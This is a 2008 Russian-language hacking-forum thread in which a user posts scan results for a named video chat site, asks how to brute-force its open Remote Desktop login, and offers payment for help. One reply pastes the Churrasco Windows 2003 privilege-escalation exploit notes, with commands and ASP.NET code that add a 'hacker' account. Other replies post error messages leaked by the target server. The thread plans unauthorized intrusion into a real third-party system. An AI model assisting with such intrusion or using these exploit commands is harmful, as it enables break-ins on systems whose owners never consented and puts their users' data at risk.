ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу Америкосы учередили видео чат www.letsvideochat.net а про дыры забыли (смотрим)
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Америкосы учередили видео чат www.letsvideochat.net а про дыры забыли (смотрим)
  #1  
Старый 29.11.2008, 00:07
Аватар для Spider_Klim
Spider_Klim
Новичок
Регистрация: 15.07.2006
Сообщений: 18
Провел на форуме:
34652

Репутация: 3
Отправить сообщение для Spider_Klim с помощью ICQ
Wink Америкосы учередили видео чат www.letsvideochat.net а про дыры забыли (смотрим)
Есть видео чат www.letsvideochat.net.

Система видновс 2003 сервер.

Открытые порты:

порт 80 .
баги:
Список cookie
1. PHPSESSID=80b45d9a61247a56de7adc955edbc009; path=/

Список ссылок найденных на веб-сервере, которые используют какие-либо параметры:

/chat.php?c=1227892930


Список форм

Обнаружены формы (POST запрос), использующиеся для передачи данных на сервер. В переменных HIDDEN может храниться специфическая или чувствительная информация. Переменные PASSWORD служат для ввода пароля.

Список форм:

POST /login1.php HTTP/1.1
user_name=&user_password=

POST /register1.php HTTP/1.1
user_name=&user_pass=&user_cpass=&user_e_mail=&use r_city=&user_region=&FilePic=&terms=&user_sex=&use r_birthday_month=

POST /search.php HTTP/1.1
sex=&age=

POST /forgot1.php HTTP/1.1
user_e_mail=

........................

Честно говоря что мне это даёт я не понимаю.


Но открыт порт:

Порт 3389

Запущен сервис удалённого управления компьютером.


Я подключался.. требует логин и пароль.. скажите какой программой брут подключить.

Кто желает помочь мне я буду только рад и если хотите принять участие вперёд.
 
Ответить с цитированием

  #2  
Старый 29.11.2008, 00:41
Аватар для DVD_RW
DVD_RW
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме:
3248203

Репутация: 628


По умолчанию
только эксплойт... брутфорс врятли опможет
 
Ответить с цитированием

  #3  
Старый 29.11.2008, 00:42
Аватар для cash$$$
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию
XSpider конечно рулит...

Держи сплойт:

Код:
(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) 
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows 
services accounts can impersonate.  Other process (not services) that can impersonate are IIS 6 worker processes 
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide 
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: http://milw0rm.com/sploits/2008-Churrasco.zip

Enjoy.

Cesar.

# milw0rm.com [2008-10-08]
 
Ответить с цитированием

  #4  
Старый 29.11.2008, 02:27
Аватар для Spider_Klim
Spider_Klim
Новичок
Регистрация: 15.07.2006
Сообщений: 18
Провел на форуме:
34652

Репутация: 3
Отправить сообщение для Spider_Klim с помощью ICQ
По умолчанию
Осталось шел халявный найти
 
Ответить с цитированием

  #5  
Старый 30.11.2008, 05:12
Аватар для Spider_Klim
Spider_Klim
Новичок
Регистрация: 15.07.2006
Сообщений: 18
Провел на форуме:
34652

Репутация: 3
Отправить сообщение для Spider_Klim с помощью ICQ
По умолчанию
Люди я откомпировал експлойт но он запускает у меня..

Вы конечно меня простите но я просто первый раз это делаю..

Вы не могли бы мне объяснить что должно произайти.

что я не так делаю
 
Ответить с цитированием

  #6  
Старый 30.11.2008, 08:03
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию
Для начала воще удали Xspider, потому что он выдаёт всякую хрень.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #7  
Старый 30.11.2008, 10:15
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию
+1 ... удали раз и на всегда xspider ...
он никогда ... никогда тебе не поможет...
 
Ответить с цитированием

  #8  
Старый 30.11.2008, 10:25
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию
ручками работай ручками
я вот это нашел
Цитата:
<br /> <b>Warning</b>: imagecreatetruecolor() [<a href='function.imagecreatetruecolor'>function.imag ecreatetruecolor</a>]: Invalid image dimensions in <b>C:\Program Files\PHP52\lvch\thumbnail.php</b> on line <b>53</b><br /> <br /> <b>Warning</b>: imagecopyresampled(): supplied argument is not a valid Image resource in <b>C:\Program Files\PHP52\lvch\thumbnail.php</b> on line <b>55</b><br /> <br /> <b>Warning</b>: imagejpeg(): supplied argument is not a valid Image resource in <b>C:\Program Files\PHP52\lvch\thumbnail.php</b> on line <b>57</b><br /> <br /> <b>Warning</b>: imagedestroy(): supplied argument is not a valid Image resource in <b>C:\Program Files\PHP52\lvch\thumbnail.php</b> on line <b>61</b><br />
и вот это

Цитата:
Fatal error: Maximum execution time of 30 seconds exceeded in C:\Program Files\PHP52\lvch\search.php on line 386
Последний раз редактировалось heks; 30.11.2008 в 10:36..
 
Ответить с цитированием

  #9  
Старый 30.11.2008, 16:12
Аватар для Spider_Klim
Spider_Klim
Новичок
Регистрация: 15.07.2006
Сообщений: 18
Провел на форуме:
34652

Репутация: 3
Отправить сообщение для Spider_Klim с помощью ICQ
По умолчанию
Хорошо удалил помогите с експлойтом..


Я подключаюсь к порту 3389..

он выдаёт мне Подключение к удаленному рабочему столу...

а там логин и пороль а что дальше делать я незнаю..

ребят кто поможет сразу 250 рублей нащёт на телефон.
Последний раз редактировалось Spider_Klim; 01.12.2008 в 03:46..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ